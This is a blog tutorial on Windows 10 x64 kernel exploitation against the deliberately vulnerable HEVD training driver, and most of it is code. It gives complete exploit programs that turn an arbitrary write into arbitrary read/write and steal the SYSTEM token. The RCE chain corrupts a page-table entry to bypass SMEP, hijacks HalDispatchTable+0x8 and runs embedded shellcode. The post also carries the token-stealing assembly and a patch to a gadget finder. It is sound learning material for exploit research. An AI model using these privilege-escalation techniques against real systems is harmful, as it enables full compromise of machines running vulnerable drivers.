Windows 10 x64 Kernel Exploitation - Arbitrary Write (Write-What-Where) using HEVD
What's a Write-What-Where (WWW)
*Where = *What;
Turning an Arbitrary Write into an Arbitrary Read
The What is the address we want to read, and the Where is the address of a user-mode variable.
void WriteQWORD(HANDLE hHEVD, PVOID what, PVOID where) {
WRITE_WHAT_WHERE www = {
.What = what,
.Where = where,
};
DWORD dwBytesReturned = 0;
DeviceIoControl(
hHEVD,
HEVD_IOCTL_ARBITRARY_WRITE,
&www,
sizeof(WRITE_WHAT_WHERE),
NULL,
0x00,
&dwBytesReturned,
NULL);
}
u64 HalDispatchTable08 = kernelBase + 0xc00a68; // ? nt!HalDispatchTable+0x8 - nt
// Read the QWORD stored at nt!HalDispatchTable+0x8 (What) into halDispatchTable08Val (Where)
u64 halDispatchTable08Val = 0;
WriteQWORD(hHEVD, (PVOID)HalDispatchTable08, &halDispatchTable08Val);
Note: HalDispatchTable08 (the What) is already an address; the driver dereferences it to get the data it points to. But we MUST pass the address of halDispatchTable08Val (using &) as the Where, not the value of the variable (which in this example is 0).
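To make the read-from-write trick concrete, here is a minimal user-mode sketch. It does not talk to HEVD at all: sim_write_what_where is a hypothetical stand-in that assumes the vulnerable IOCTL simply copies one QWORD from What to Where, and the other two helper names are made up for illustration.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the vulnerable IOCTL. Assumption: the driver
 * copies one QWORD from the address in `what` to the address in `where`,
 * i.e. *Where = *What. */
static void sim_write_what_where(const void *what, void *where) {
    memcpy(where, what, sizeof(uint64_t));
}

/* Arbitrary write: What points at our own variable holding the value,
 * Where is the target address. */
static void sim_write_qword(uint64_t value, void *target) {
    sim_write_what_where(&value, target);
}

/* Arbitrary read: What is the address we want to read,
 * Where is the address of our own variable. */
static uint64_t sim_read_qword(const void *target) {
    uint64_t out = 0;
    sim_write_what_where(target, &out);
    return out;
}
```

The only difference between the two helpers is which side of the copy is "ours": for a write we own the What, for a read we own the Where.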
Methods for Exploitation (without RCE)
You can basically reimplement the token stealing shellcode from the previous blog using the arbitrary read/write primitive. There is a slight distinction: in the shellcode we have the pointer to our own process (from the gs register) and search for the PID 4 (SYSTEM) process. In this method it's the opposite: we have the PID 4 (SYSTEM) process pointer (from PsInitialSystemProcess) and have to search for our own process.
This code will replace the token of the current process with that of PsInitialSystemProcess (the PID 4 process).
#include <Windows.h>
#include <Psapi.h>
#include <stdio.h>
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802)
typedef unsigned long long u64;
typedef struct _WRITE_WHAT_WHERE {
PVOID What;
PVOID Where;
} WRITE_WHAT_WHERE;
void WriteQWORD(HANDLE hHEVD, PVOID what, PVOID where) {
WRITE_WHAT_WHERE www = {
.What = what,
.Where = where,
};
DWORD dwBytesReturned = 0;
DeviceIoControl(
hHEVD,
HEVD_IOCTL_ARBITRARY_WRITE,
&www,
sizeof(WRITE_WHAT_WHERE),
NULL,
0x00,
&dwBytesReturned,
NULL);
}
u64 ReadQWORD(HANDLE hHEVD, PVOID what) {
u64 val = 0;
WriteQWORD(hHEVD, what, &val);
return val;
}
u64 GetKernelBase(void) {
LPVOID drivers[1024] = { 0 };
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return (u64)drivers[0];
}
int main(void) {
const u64 TokenOffset = 0x4b8; // dt _EPROCESS Token
const u64 ActiveProcessLinksOffset = 0x448; // dt _EPROCESS ActiveProcessLinks
const u64 UniqueProcessIdOffset = 0x440; // dt _EPROCESS UniqueProcessId
const u64 PsInitialSystemProcessOffset = 0xcfc420; // ? nt!PsInitialSystemProcessPtr - nt
HANDLE hHEVD = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHEVD == INVALID_HANDLE_VALUE) ExitProcess(1);
u64 kernelBase = GetKernelBase();
if (kernelBase == 0) ExitProcess(1);
u64 PsInitialSystemProcessPtr = ReadQWORD(hHEVD, (PVOID)(kernelBase + PsInitialSystemProcessOffset));
printf("PsInitialSystemProcessPtr: 0x%llx\n", PsInitialSystemProcessPtr);
u64 SystemProcessTokenPtr = ReadQWORD(hHEVD, (PVOID)(PsInitialSystemProcessPtr + TokenOffset)) & ~0xFULL;
printf("SystemProcessTokenPtr: 0x%llx\n", SystemProcessTokenPtr);
DWORD TargetPID = GetCurrentProcessId();
u64 ProcessHead = PsInitialSystemProcessPtr;
// Walk ActiveProcessLinks until we find our own PID; bail out if we wrap back around to SYSTEM
do {
ProcessHead = ReadQWORD(hHEVD, (PVOID)(ProcessHead + ActiveProcessLinksOffset)) - ActiveProcessLinksOffset;
if (ProcessHead == PsInitialSystemProcessPtr) ExitProcess(1);
} while (ReadQWORD(hHEVD, (PVOID)(ProcessHead + UniqueProcessIdOffset)) != TargetPID);
// Keep our own reference count bits (low 4 bits) and swap in the SYSTEM token pointer
u64 TargetProcessTokenRefCount = ReadQWORD(hHEVD, (PVOID)(ProcessHead + TokenOffset)) & 15;
u64 FinalToken = TargetProcessTokenRefCount | SystemProcessTokenPtr;
WriteQWORD(hHEVD, &FinalToken, (PVOID)(ProcessHead + TokenOffset));
STARTUPINFOW si = { .cb = sizeof(STARTUPINFOW) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessW(L"C:\\Windows\\System32\\cmd.exe",
NULL, NULL, NULL, FALSE, 0, NULL, NULL,
&si, &pi))
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return 0;
}
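The process search can be tried out safely in user mode first. The following is a minimal sketch against a mock process list: mock_eprocess, mock_links, from_links, and find_process are hypothetical names, and the struct layout is a simplification, not the real _EPROCESS. It stops once it wraps back around to the starting entry, so a missing PID cannot spin forever.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified stand-ins for LIST_ENTRY and _EPROCESS.
 * Real layouts and offsets differ per Windows build. */
typedef struct mock_links {
    struct mock_links *flink;
    struct mock_links *blink;
} mock_links;

typedef struct mock_eprocess {
    uint64_t   pid;    /* stands in for UniqueProcessId */
    mock_links links;  /* stands in for ActiveProcessLinks */
    uint64_t   token;  /* stands in for Token */
} mock_eprocess;

/* Flink points at the links member of the next entry, so subtract the
 * member offset to get back to the start of the structure. */
static mock_eprocess *from_links(mock_links *l) {
    return (mock_eprocess *)((char *)l - offsetof(mock_eprocess, links));
}

/* Walk the circular list starting at `head`. Returns NULL if the PID is
 * not found after one full lap or after max_steps entries. */
static mock_eprocess *find_process(mock_eprocess *head, uint64_t pid,
                                   size_t max_steps) {
    mock_eprocess *cur = head;
    for (size_t i = 0; i < max_steps; i++) {
        if (cur->pid == pid) return cur;
        cur = from_links(cur->links.flink);
        if (cur == head) break;  /* wrapped around */
    }
    return NULL;
}
```

In the real exploit every pointer dereference here becomes one ReadQWORD call, which is why the subtraction of the ActiveProcessLinks offset shows up explicitly.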
However, we didn't come all this way to simply get SYSTEM. RCE in the kernel || GTFO.
Methods for RCE Exploitation
Literally all you need is:
- Any function pointer in the kernel (that isn't called too often)
- A way to trigger the kernel to call it
- (Optional) Control over some registers when you trigger the call. It doesn't matter if you don't have it: you can overwrite the pointer with the address of shellcode stored in the kernel.
- (Optional) The function pointer stored in a writable page. It doesn't matter if it isn't: you can make the page writable by modifying the PTE.
I'm certain there are countless ways to exploit a WWW, but finding them is not easy and is beyond the scope of this blog. I'll focus on the very well-known public technique of the HalDispatchTable, which meets all 4 of the criteria.
The HalDispatchTable is a table of function pointers. We can overwrite the 2nd entry at HalDispatchTable+0x08, and trigger it with NtQueryIntervalProfile.
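As a user-mode analogy only, the save / overwrite / trigger / restore pattern looks roughly like the sketch below. Nothing here touches the kernel: mock_dispatch_table, trigger, and both handlers are hypothetical names standing in for HalDispatchTable, the NtQueryIntervalProfile call path, and the legitimate and attacker-chosen targets.

```c
#include <stdint.h>

typedef uint64_t (*dispatch_fn)(uint64_t arg);

/* Hypothetical legitimate target and attacker-chosen target. */
static uint64_t legit_handler(uint64_t arg)  { return arg + 1; }
static uint64_t hijack_handler(uint64_t arg) { return arg * 2; }

/* Hypothetical two-entry table standing in for HalDispatchTable.
 * Entry 1 sits at byte offset +0x8 on a 64-bit build. */
static dispatch_fn mock_dispatch_table[2] = { 0, legit_handler };

/* Stand-in for the code path that calls through the second entry. */
static uint64_t trigger(uint64_t arg) {
    return mock_dispatch_table[1](arg);
}

/* Save the original pointer, overwrite it, trigger the call once,
 * then restore the original so later callers are not affected. */
static uint64_t hijack_once(uint64_t arg) {
    dispatch_fn saved = mock_dispatch_table[1];
    mock_dispatch_table[1] = hijack_handler;
    uint64_t result = trigger(arg);
    mock_dispatch_table[1] = saved;
    return result;
}
```

Restoring the entry matters in the real thing too: other kernel code may call through the same pointer later.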
The big question is, wtf do we put in the HalDispatchTable? Ideally, the address of some shellcode, right? But there are several considerations to be made with regard to modern security controls in Windows.
- Firstly, like in the Stack Buffer Overflow blog, SMEP won't let us execute user land addresses in the kernel.
- kCFG (kernel Control-Flow Guard), even when VBS/HVCI is disabled, will perform a bitwise test to ensure user mode addresses aren't called from kernel mode. This happens during guarded calls, which is the case for the HalDispatchTable. This is basically SMEP implemented again but in a different way. If VBS/HVCI is enabled, it's way, way more strict.
- There is also Kernel Page-Table Isolation (KPTI) (also known as Kernel Virtual Address (KVA) Shadow), which as I understand it causes user land pages to be mapped into the kernel without the executable bit. Every time I had issues, I thought it might be this, but in the end it wasn't, and I did nothing special to bypass KPTI, so I will continue not knowing exactly what it's doing or stopping.
With these in mind, we have a few options:
- Put the address of a ROP gadget to Stack Pivot, ROP to disable SMEP and ret into the shellcode.
- Use the Arbitrary Write to modify the shellcode PTE, and a jmp/call gadget to execute the shellcode.
- Find or use the Arbitrary Write to modify a page within the kernel, making it Read-Write-Execute. Write the shellcode into that page, and put that shellcode address into the HalDispatchTable.
I decided to implement the 2nd option.
Finding a JMP/CALL Gadget
While I was working on this late at night, I forgot jmp gadgets exist, and became obsessed with finding a call rbx; ret gadget. I quickly discovered that ropr only finds a call when it is the last instruction of a gadget. It filters call instructions out of the body of ROP gadget chains (because you'd rarely ever want them). So, any gadget chain that ends in ret will NEVER contain a call. This was going to be a problem, and while I could use another tool, I figured it would be easier to learn some Rust and make ropr do what I want.
It turns out it was fairly easy to get the behaviour I wanted by modifying the is_rop_gadget_head function.
diff --git a/src/rules.rs b/src/rules.rs
index 0cb2992..3993d22 100644
--- a/src/rules.rs
+++ b/src/rules.rs
@@ -86,7 +86,8 @@ pub fn is_rop_gadget_head(instr: &Instruction, noisy: bool) -> bool {
match instr.flow_control() {
FlowControl::Next | FlowControl::Interrupt => true,
FlowControl::ConditionalBranch => noisy,
- FlowControl::Call => instr.mnemonic() != Mnemonic::Call,
+ FlowControl::Call => true,
+ FlowControl::IndirectCall => true,
_ => false,
}
}
In the end, I used a jmp rbx gadget anyway. But I thought this was a fun little adventure, and it might be useful to know in the future for finding weird gadget chains.
Getting RCE in 13 Easy Steps
- VirtualAlloc Shellcode as PAGE_EXECUTE_READWRITE
- Get Kernel Base /w EnumDeviceDrivers
- Setup NtQueryIntervalProfile /w GetProcAddress
- Find Offsets to MiGetPteAddress, HalDispatchTable, and jmp rbx gadget
- Get Driver Handle
- Leak virtual address of shellcode's PTE entry
- Leak shellcode's PTE control bits
- Modifying shellcode's PTE entry to bypass SMEP (Clear U/S bit)
- Save the nt!HalDispatchTable+0x8 so we can restore later
- Overwrite HalDispatchTable+0x8 with a ROP gadget
- Trigger HalDispatchTable+0x8 /w shellcode pointer in rbx
- Restore the HalDispatchTable and PTE
- Open a cmd.exe with the new SYSTEM token
I might update this blog later with more explanation but I think the code is fairly self-explanatory. The tricky part with the PTE has already been explained better than I can at https://connormcgarr.github.io/pte-overwrites/ and https://connormcgarr.github.io/paging/.
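As a small aid for the PTE steps, the arithmetic can be isolated into two pure functions. This is a sketch under stated assumptions: pte_address and pte_make_supervisor are hypothetical helper names, the shift and mask are the ones used in the exploit code in this post, and pte_base would be the value leaked from nt!MiGetPteAddress+0x13 at run time.

```c
#include <stdint.h>

/* Bit 2 of an x64 PTE is U/S: set means the page is user-accessible. */
#define PTE_USER_BIT (1ULL << 2)

/* Virtual address of the PTE that maps `va`.
 * va >> 9 is (va >> 12) * 8: the page number times the 8-byte PTE size.
 * The mask keeps the 36-bit page number and clears the low 3 bits. */
static uint64_t pte_address(uint64_t va, uint64_t pte_base) {
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + pte_base;
}

/* Clear U/S so the page looks like a kernel page, which is what stops
 * SMEP from faulting when the kernel executes it. */
static uint64_t pte_make_supervisor(uint64_t pte) {
    return pte & ~PTE_USER_BIT;
}
```

For example, with an illustrative pte_base of 0xFFFFF68000000000, the page at virtual address 0x1000 is page number 1, so its PTE lives 8 bytes past the base.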
#include <Windows.h>
#include <Psapi.h>
#include <stdio.h>
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802)
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef struct _WRITE_WHAT_WHERE {
PVOID What;
PVOID Where;
} WRITE_WHAT_WHERE;
void WriteQWORD(HANDLE hHEVD, PVOID what, PVOID where) {
WRITE_WHAT_WHERE www = {
.What = what,
.Where = where,
};
DWORD dwBytesReturned = 0;
DeviceIoControl(
hHEVD,
HEVD_IOCTL_ARBITRARY_WRITE,
&www,
sizeof(WRITE_WHAT_WHERE),
NULL,
0x00,
&dwBytesReturned,
NULL);
}
u64 ReadQWORD(HANDLE hHEVD, PVOID what) {
u64 val = 0;
WriteQWORD(hHEVD, what, &val);
return val;
}
int main(void) {
// ========================
// == 1. Setup Shellcode ==
// ========================
const u8 token_steal_shellcode[] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04,
0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x4d, 0x8b,
0x88, 0xb8, 0x04, 0x00, 0x00, 0x4c, 0x89, 0x88, 0xb8, 0x04, 0x00, 0x00,
0x48, 0x31, 0xc0, 0xc3};
LPVOID shellcode = VirtualAlloc(NULL, sizeof(token_steal_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!shellcode) ExitProcess(1);
RtlMoveMemory(shellcode, token_steal_shellcode, sizeof(token_steal_shellcode));
printf("[+] Shellcode is located at: 0x%p\n", shellcode);
// ========================
// == 2. Get Kernel Base ==
// ========================
LPVOID drivers[1024] = { 0 };
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
const u64 kernelBase = (u64)drivers[0];
if (kernelBase == 0) ExitProcess(1);
printf("[+] Kernel Base is located at: 0x%p\n", drivers[0]);
// =====================================
// == 3. Setup NtQueryIntervalProfile ==
// =====================================
NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) ExitProcess(1);
printf("[+] NtQueryIntervalProfile is located at: 0x%p\n", NtQueryIntervalProfile);
// ==============================
// == 4. Setup Kernel Pointers ==
// ==============================
u64 ntmigetpteAddress = kernelBase + 0x27f783; // ? nt!MiGetPteAddress+0x13 - nt
u64 haldispatchTable = kernelBase + 0xc00a68; // ? nt!HalDispatchTable+0x8 - nt
//u64 CALL_RBX = kernelBase + 0x4e7ba8; // call rbx;
u64 JMP_RBX = kernelBase + 0x41f300; // jmp rbx;
printf("[+] nt!MiGetPteAddress+0x13 is located at: 0x%llx\n", ntmigetpteAddress);
printf("[+] nt!HalDispatchTable+0x8 is located at: 0x%llx\n", haldispatchTable);
printf("[+] JMP_RBX gadget is located at: 0x%llx\n", JMP_RBX);
// =========================
// == 5. Get Driver Handle ==
// =========================
HANDLE hHEVD = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hHEVD == INVALID_HANDLE_VALUE) ExitProcess(1); // CreateFileA signals failure with INVALID_HANDLE_VALUE, not NULL
// =========================
// == 6. Leaking virtual address of shellcode's PTE entry
// =========================
u64 pteBase = ReadQWORD(hHEVD, (PVOID)ntmigetpteAddress);
printf("[+] Base of the page table entries: 0x%llx\n", pteBase);
// Bitwise operations to locate PTE of shellcode page
u64 shellcodePte = (u64)shellcode >> 9;
shellcodePte = shellcodePte & 0x7FFFFFFFF8;
shellcodePte = shellcodePte + pteBase;
printf("[+] Shellcode's PTE is located at: 0x%llx\n", shellcodePte);
// =========================
// == 7. Leaking shellcode's PTE control bits
// =========================
u64 ptecontrolBits = ReadQWORD(hHEVD, (PVOID)shellcodePte);
printf("[+] PTE control bits for shellcode page: 0x%llx\n", ptecontrolBits);
// =========================
// == 8. Modifying shellcode's PTE entry to bypass SMEP
// =========================
u64 taintedPte = ptecontrolBits; // Start from the original PTE value
taintedPte &= ~(1ULL << 2); // Clear U/S bit (Kernel Mode)
//taintedPte &= ~(1ULL << 63); // Clear XD bit (Executable) Apparently not needed
printf("[+] Corrupting PTE of shellcode to make U/S bit kernel mode...\n");
WriteQWORD(hHEVD, &taintedPte, (PVOID)shellcodePte);
// =========================
// == 9. Save the nt!HalDispatchTable+0x8 so we can restore later
// =========================
u64 legitimateHal = ReadQWORD(hHEVD, (PVOID)haldispatchTable);
// =========================
// == 10. Overwrite HalDispatchTable+0x8 with a ROP gadget
// =========================
WriteQWORD(hHEVD, &JMP_RBX, (PVOID)haldispatchTable);
// =========================
// == 11. Trigger HalDispatchTable+0x8 /w shellcode in rbx
// =========================
NtQueryIntervalProfile(0x1234, (PULONG)shellcode);
// =========================
// == 12. Restore the HalDispatchTable and PTE ==
// =========================
WriteQWORD(hHEVD, &legitimateHal, (PVOID)haldispatchTable);
WriteQWORD(hHEVD, &ptecontrolBits, (PVOID)shellcodePte);
//WriteBytes(hHEVD, &originalPml4Shellcode_Entry, pml4Shellcode_VirtualAddress);
// =========================
// == 13. Open a cmd.exe with the new SYSTEM token
// =========================
STARTUPINFOW si = { .cb = sizeof(STARTUPINFOW) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessW(L"C:\\Windows\\System32\\cmd.exe",
NULL, NULL, NULL, FALSE, 0, NULL, NULL,
&si, &pi))
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return 0;
}
It took me days to solve a BSOD caused by the token stealing shellcode (shown below). This shellcode has been posted on hundreds of blogs, and is imo wrong.
[BITS 64]
start:
mov rax, [gs:0x188] ; KPRCB.CurrentThread (_KTHREAD)
mov rax, [rax + 0xb8] ; APCState.Process (current _EPROCESS)
; dt nt!_KTHREAD ApcStateFill + dt nt!_KAPC_STATE Process
mov r8, rax ; Store current _EPROCESS ptr in R8
loop:
mov r8, [r8 + 0x448] ; ActiveProcessLinks (dt _EPROCESS ActiveProcessLinks)
sub r8, 0x448 ; Go back to start of _EPROCESS (same offset as above)
mov r9, [r8 + 0x440] ; UniqueProcessId (PID) (dt _EPROCESS UniqueProcessId)
cmp r9, 4 ; SYSTEM PID?
jnz loop ; Loop until PID == 4
replace:
mov r9, [r8 + 0x4b8] ; Get SYSTEM token (dt _EPROCESS Token)
; and r9, 0xf0 ; Clear low 4 bits of _EX_FAST_REF structure
mov [rax + 0x4b8], r9 ; Copy SYSTEM token to current process (dt _EPROCESS Token)
xor rax,rax
ret
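The and r9, 0xf0 line, which is meant to clear the reference counting bits, causes a SYSTEM_SERVICE_EXCEPTION BSOD. Note that a mask of 0xf0 keeps only bits 4-7 and zeroes everything else, including the pointer itself; a mask that clears just the low 4 bits would be 0xfffffffffffffff0. I actually figured this out because I got this stack trace on a BSOD: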
If we Google ObfReferenceObjectWithTag you don't find much, but you will find similar functions like:
The ObDereferenceObjectWithTag routine decrements the reference count of the specified object, and writes a four-byte tag value to the object to support object reference tracing
and
The ObfReferenceObject routine increments the reference count to the given object.
The general theme is that these functions play with the reference counting bits that we just NULL'ed into oblivion. I actually think the shellcode can be improved by keeping the original ref counting bits and only replacing the token pointer, but after commenting out that line (shown above), the PoC has never caused a BSOD, so that's good enough for me for now.
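The improvement hinted at here can be sketched as plain bit arithmetic. This is an illustration under the assumption that the low 4 bits of the _EX_FAST_REF value are the reference count and the rest is the token pointer; all three function names are hypothetical. The first function also shows what a mask of 0xf0 actually does to a token value.

```c
#include <stdint.h>

/* Assumption: the low 4 bits of the _EX_FAST_REF value hold the
 * fast reference count, the remaining bits are the token pointer. */
#define FAST_REF_MASK 0xFULL

/* What masking with 0xf0 computes: only bits 4-7 survive,
 * so the pointer part of the value is destroyed. */
static uint64_t mask_with_0xf0(uint64_t token) {
    return token & 0xF0ULL;
}

/* Token pointer with the reference count bits cleared. */
static uint64_t token_pointer(uint64_t token) {
    return token & ~FAST_REF_MASK;
}

/* SYSTEM token pointer combined with our own reference count bits. */
static uint64_t replace_keep_refcount(uint64_t system_token,
                                      uint64_t own_token) {
    return token_pointer(system_token) | (own_token & FAST_REF_MASK);
}
```

This is the same combination the data-only version earlier in the post performs with TargetProcessTokenRefCount and SystemProcessTokenPtr.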